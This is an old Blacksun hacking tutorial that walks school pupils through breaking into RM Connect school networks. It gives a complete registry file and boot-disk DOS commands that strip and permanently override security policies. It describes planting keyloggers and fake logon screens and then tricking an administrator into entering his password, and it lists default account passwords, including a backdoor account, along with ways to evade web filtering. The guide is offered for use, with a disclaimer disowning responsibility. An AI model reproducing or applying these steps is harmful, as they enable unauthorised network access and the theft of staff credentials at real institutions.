:::::::::   ::::::::  :::::::::  :::::::::: 

                    :+:    :+: :+:    :+: :+:    :+: :+:        

                    +:+    +:+ +:+        +:+    +:+ +:+        

                    +#++:++#+  +#++:++#++ +#++:++#:  :#::+::#   

                    +#+    +#+        +#+ +#+    +#+ +#+        

                    #+#    #+# #+#    #+# #+#    #+# #+#        

                    #########   ########  ###    ### ###  

                         

              	         http://blacksun.box.sk

                           ____________________

    ______________________I      Topic:        I_____________________

   \                      I   The RM Hacking   I                    /

    \     Html by         I      Tutorial      I   Written by:     /

    >                     I                    I                  < 

   /      Mikkkeee        I____________________I   Distant Nebula  \

  /___________________________>           <_________________________\

   			    
Distant Nebulas Tutorial

Welcome To Distant Nebulas Tutorial. I will talk you through the easiest and most efficent way to hack the RM Connect Network!

.::Contents::.

-Introduction 1.0
-Disclaimer 1.1
-Inroduction to RM 1.2
-The Restrictions 1.3
-How to get past the Restrictions 1.4
-Setting up a Keylogger 1.5
-Using Fake Logon Screens 1.6
-Administrator tools 1.7
-Default Passwords 1.8
-Internet Filtering 1.9
-Propagate Account 2.0
-Contact Information 2.1
-Shout Outs 2.2

-For Admin Password see 1.5 and 1.6

1.0 Introduction:
Most schools are now using the most annoying network aroung 'RM Connect'. This textwill explain how to go about
hacking your way through it but before you read on read the disclaimer.

1.1 Disclaimer:
By reading this you are agreeing that I will not be held responsible for anything that you do with the contents of this text. Remember if you get caught you will be in big trouble and don't tell them where you got your information from because to be trully honest with you i don't care.

1.2 Introduction to RM:
Most schools are now using RM. The version that i will be talking about is  the latset 2.3. 2.3 has the most restrictions possible and few security holes that we can take advantage of.

1.3 The Restrictions:
 I will go through the most annoying restrictions that RM have introduced. They have disabled right click on the desktop, you can't access programs such as explorer, regedit, control pannel etc... My Computer has been disabled so you can't have easy access to the drives. Even if you do get to see all the drives you won't have access to drives such as L: which contains all the admin programs. You can't write to the hard drive and there are a lot more but I can't be bothered to go through them.

1.4 How to get past the Restrictions:
All it takes is a simple reg file to run. Open up notepad and copy this in there

Regedit4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Now save this as a .reg file and run it. If this doesn't work for some reason save it as a .bfg file then double click and
you should get the open with box up. Now go to other c:\windows\regedit.exe and OK. Now run it.

If you want all the restriction to go away then add the following to the reg above

[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000
"NoViewContextMenu"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoVirtMemPage"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000
"Disable"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000
"NoAddingComponents"=dword:00000000
"NoDeletingComponents"=dword:00000000
"NoEditingComponents"=dword:00000000
"NoClosingComponents"=dword:00000000

You can't keep this from working once you logoff unless you do the following.

Before we start you need a win9x or NT boot disk. Copy your new reg to c:\windows\spool\printers along with user.dat and
system.dat (c:\windows) Now reboot and put the boot disk in and when you are iin dos type the following

c:
cd windows\spool\printers
copy *.dat c:\windows
copy *.dat c:\backup
cd \
cd backup
copy user.dat user.da0
copy user.dat user.da1
copy system.dat system.da0
copy system.dat system.da1
copy *.da0 c:\windows

You have now done it.

1.5 Setting up a Keylogger:
Now you have the edited reg running windows you can now use keyloggers. Use Echo or ik97 these don't have fixed directorys so you can hide them. To set them up you need to use one of RM Tools against them. First copy the contents of the keylogger to c:\windows\spool\printers and now on the start toolbar look for the little soldier in the tray and double click on him. This is DR Solomons virus checker. Now logoff your file and to your suprise you will see that DR Solomons is still up. In the help go to contents and then file, open. In the box type c:\windows\spool\printers and then *.exe now run the key logger from there. Now tell the admin that you have forgotten your password and with a bit of luck he might use your computer and fall into your trap. When he changes your password get back on the computer and go to c:\windows\spool\printers and run the txt file now the admin password will be there in front of you.

1.6 Using Fake Logon Screens:
Believe me this is fun to do. I recommend either XLOGONRM or projectx both of these can be downloaded from my web site. Both of these have advantages and disadvantages.
XLOGONRM:
This is ran from your disk and makes a fake logoff button once you logoff (you really do logoff your file which is
good) this will bring up a fake logon box. It is weird with my school because the fake one loads up then the real one
comes in front just move the real one out the way and click on the fake one. Just get the admin to use it and it will say
password is wrong when you go on again it will save the password straight todisk. Note there is a file called config.ini
where you can change the domain name and logos. A disadvantage is it wont start up at the beginning like projectx does but
with projectx you can't  change the domain name. Another disadvantage is you can only store up to 10 passwords on a disk.
ProjectX:
         This one is probably my favourite. It starts up when the PC is turned on and will store as many passwords as it
likes. Disadvantages are that unlike XLOGONRM it needs to be ran from the hard drive so other people could see the passwords and you can't change the domain name or the logo.

1.7 Administrator Tools:

RM Password Manager: Change everones password
except admin accounts. (available from my site)
RM User Manager: Change everyones restrictions
and add new users (available from my site)
RM Desktop Manager: Change everybodys desktop
(available from my site)
Application Wizard: Add programs across the
network
All of these tools are found in L: this drive is
only in admin accounts or deskman.

1.8 Default Passwords



 
User
Password
Notes 
admin2 
changeme 
Normally Changed Admin Account

administrator 

changeme 
Normally Changed Admin Account
deskalt
 password
 
deskman
 changeme 
Access L: to change the network
desknorm
password 
  Standard Desktop
deskres
 password
 
guest 
<NO PASSWORD> 
Disabled by default
propagate
 application
 
RMUSER1 
 password
Works on RMUSER1 through to RMUSER49
temp1 
 password 
Not Confirmed
setup 
changeme
 
teacher 
password
 
topicalt 
password
 
topicres 
password
 
topicnorm 
password

Other Passwords



 
For
Password
Notes
BIOS
RM
Hit <del> as the computer boots to enter the

BIOS area

1.9 Internet Filtering:
 The easiest way to be able to view any web site is to go to http://babelfish.astalavista.com this just type in the site you want to go to (remember http://) and go to translate german to english or whatever and there you go or you can try http://www.askjeeves.com both of these work.

2.0 Propagate Account:
This is a special account on the RM Network it is like a backdoor  cause the password can't be changed the weird thing is that if you take the network cable out the back of the PC (the one that looks like a telephone wire) then the computer trys to connect to this account automatically. The password is Application. The propagate account isn't anything special it just has an unrestricted shell.

2.1 Contact

You can contact me at Distant_Nebula@Hotmail.com Or go to this web site for more information http://www.freewebz.com/darkpages

2.2 Shout Outs

Hi to Crystal Dagger, Merlin, Mr Big Feet, Fallen Angel

Http://blacksun.box.sk